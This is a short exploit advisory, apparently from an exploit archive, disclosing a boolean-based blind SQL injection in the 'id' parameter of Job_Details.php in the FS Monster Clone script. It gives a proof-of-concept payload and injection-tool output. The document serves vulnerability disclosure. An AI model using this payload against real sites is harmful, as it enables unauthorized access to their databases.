Home / os / winmobile

FS Monster Clone SQL Injection

Posted on 26 October 2017

# Exploit Title: FS Monster Clone - 'id' SQL Injection # Date: 2017-10-24 # Exploit Author: 8bitsec # Vendor Homepage: https://fortunescripts.com/ # Software Link: https://fortunescripts.com/product/monster-clone/ # Version: 24 October 17 # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] # Email: contact@8bitsec.io # Contact: https://twitter.com/_8bitsec Release Date: ============= 2017-10-24 Product & Service Introduction: =============================== A highly sought after W3 compliant web solution standing out tall with a host of exciting features packed in. Technical Details & Description: ================================ SQL injection on [id] parameter. Proof of Concept (PoC): ======================= SQLi: https://localhost/[path]/Job_Details.php?id=6 AND 9364=9364 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=6 AND 9364=9364 ================== 8bitsec - [https://twitter.com/_8bitsec]

 

TOP